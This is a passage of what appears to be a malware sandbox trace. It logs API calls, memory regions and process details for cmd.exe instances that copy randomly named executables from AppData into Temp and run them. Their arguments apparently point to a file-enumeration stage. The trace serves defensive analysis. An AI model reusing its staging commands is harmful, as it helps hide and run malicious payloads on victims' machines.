(_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0111.500] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0111.500] lstrcmpW (lpString1="\\bkM66bYk.exe", lpString2="\\XCOPY.EXE") returned -1 [0111.502] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x26efbc*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f008 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessInformation=0x26f008*(hProcess=0x50, hThread=0x4c, dwProcessId=0xd5c, dwThreadId=0xd60)) returned 1 [0111.807] CloseHandle (hObject=0x4c) returned 1 [0111.807] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0111.807] GetEnvironmentStringsW () returned 0x3e2cf8* [0111.807] FreeEnvironmentStringsW (penv=0x3e2cf8) returned 1 [0111.807] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0112.670] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x26eefc | out: lpExitCode=0x26eefc*=0x0) returned 1 [0112.670] CloseHandle (hObject=0x50) returned 1 [0112.670] _vsnwprintf (in: _Buffer=0x26f044, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ef08 | out: _Buffer="00000000") returned 8 [0112.670] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0112.670] GetEnvironmentStringsW () returned 0x3e2480* [0112.670] FreeEnvironmentStringsW (penv=0x3e2480) returned 1 [0112.670] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0112.670] GetEnvironmentStringsW () returned 0x3e2480* [0112.670] FreeEnvironmentStringsW (penv=0x3e2480) returned 1 [0112.670] DeleteProcThreadAttributeList (in: lpAttributeList=0x26ef60 | out: lpAttributeList=0x26ef60) [0112.670] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.670] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0112.670] _get_osfhandle (_FileHandle=1) returned 0x7 [0112.670] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0112.671] _get_osfhandle (_FileHandle=0) returned 0x3 [0112.671] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0112.671] SetConsoleInputExeNameW () returned 0x1 [0112.671] GetConsoleOutputCP () returned 0x1b5 [0112.671] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0112.671] SetThreadUILanguage (LangId=0x0) returned 0x409 [0112.671] exit (_Code=0) Process: id = "40" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16820" os_pid = "0xd44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6877 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6878 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6879 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6880 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 6881 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 6882 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6883 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6884 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 6885 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 6886 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 6913 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6914 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6915 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6916 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 6917 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 6918 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 6919 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6920 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 6921 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6922 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6923 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6924 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 6925 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6926 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 6927 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 6928 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6929 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6930 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 6931 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 6932 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 6933 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 6934 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 6935 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 6936 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 7012 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 68 os_tid = 0xd48 [0111.774] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf7dc | out: lpSystemTimeAsFileTime=0x1cf7dc*(dwLowDateTime=0x80a12c60, dwHighDateTime=0x1d440a9)) [0111.774] GetCurrentProcessId () returned 0xd44 [0111.774] GetCurrentThreadId () returned 0xd48 [0111.774] GetTickCount () returned 0x26c39 [0111.774] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf7d4 | out: lpPerformanceCount=0x1cf7d4*=16856283901) returned 1 [0111.774] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0111.774] __set_app_type (_Type=0x1) [0111.774] __p__fmode () returned 0x76b331f4 [0111.774] __p__commode () returned 0x76b331fc [0111.774] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0111.774] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0111.775] GetCurrentThreadId () returned 0xd48 [0111.775] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd48) returned 0x38 [0111.775] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0111.775] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0111.775] SetThreadUILanguage (LangId=0x0) returned 0x409 [0111.775] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0111.775] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cf76c | out: phkResult=0x1cf76c*=0x0) returned 0x2 [0111.775] VirtualQuery (in: lpAddress=0x1cf7a3, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.775] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0111.775] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0111.775] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0111.775] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf73c, dwLength=0x1c | out: lpBuffer=0x1cf73c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0111.775] GetConsoleOutputCP () returned 0x1b5 [0111.775] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.775] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0111.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.775] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0111.775] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.776] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0111.776] _get_osfhandle (_FileHandle=1) returned 0x7 [0111.776] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0111.776] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.776] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0111.776] _get_osfhandle (_FileHandle=0) returned 0x3 [0111.776] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0111.776] GetEnvironmentStringsW () returned 0x3b0460* [0111.776] FreeEnvironmentStringsW (penv=0x3b0460) returned 1 [0111.776] GetEnvironmentStringsW () returned 0x3b0460* [0111.776] FreeEnvironmentStringsW (penv=0x3b0460) returned 1 [0111.776] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6dc | out: phkResult=0x1ce6dc*=0x40) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x10, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x0, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegCloseKey (hKey=0x40) returned 0x0 [0111.777] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce6dc | out: phkResult=0x1ce6dc*=0x40) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x40, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x1, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x0, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x4, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x4) returned 0x0 [0111.777] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce6e4, lpData=0x1ce6e8, lpcbData=0x1ce6e0*=0x1000 | out: lpType=0x1ce6e4*=0x0, lpData=0x1ce6e8*=0x9, lpcbData=0x1ce6e0*=0x1000) returned 0x2 [0111.777] RegCloseKey (hKey=0x40) returned 0x0 [0111.777] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886359 [0111.777] srand (_Seed=0x5b886359) [0111.777] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0111.777] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FILESEXTLIST\" \"60000\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\7l6OWDI9Fmrsoy1O.elst\" \"1\"" [0111.777] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.778] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b1bc0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0111.778] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0111.778] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.778] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.778] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0111.778] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0111.778] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0111.778] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0111.778] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0111.778] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0111.778] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0111.778] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0111.778] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0111.778] GetEnvironmentStringsW () returned 0x3b25b0* [0111.778] FreeEnvironmentStringsW (penv=0x3b25b0) returned 1 [0111.778] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.778] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.778] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0111.778] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0111.778] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0111.778] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0111.778] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0111.778] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0111.778] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0111.778] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0111.778] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf4a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.779] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf4a8, lpFilePart=0x1cf4a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf4a4*="Desktop") returned 0x18 [0111.779] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0111.779] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x3b0c40 [0111.779] FindClose (in: hFindFile=0x3b0c40 | out: hFindFile=0x3b0c40) returned 1 [0111.779] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x3b0c40 [0111.779] FindClose (in: hFindFile=0x3b0c40 | out: hFindFile=0x3b0c40) returned 1 [0111.779] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf224 | out: lpFindFileData=0x1cf224) returned 0x3b0c40 [0111.779] FindClose (in: hFindFile=0x3b0c40 | out: hFindFile=0x3b0c40) returned 1 [0111.779] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0111.779] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0111.779] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0111.779] GetEnvironmentStringsW () returned 0x3b0460* [0111.779] FreeEnvironmentStringsW (penv=0x3b0460) returned 1 [0111.780] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0111.780] GetConsoleOutputCP () returned 0x1b5 [0111.780] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0111.780] GetUserDefaultLCID () returned 0x409 [0111.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0111.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="0") returned 2 [0111.780] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf5e8, cchData=128 | out: lpLCData="0") returned 2 [0111.780] 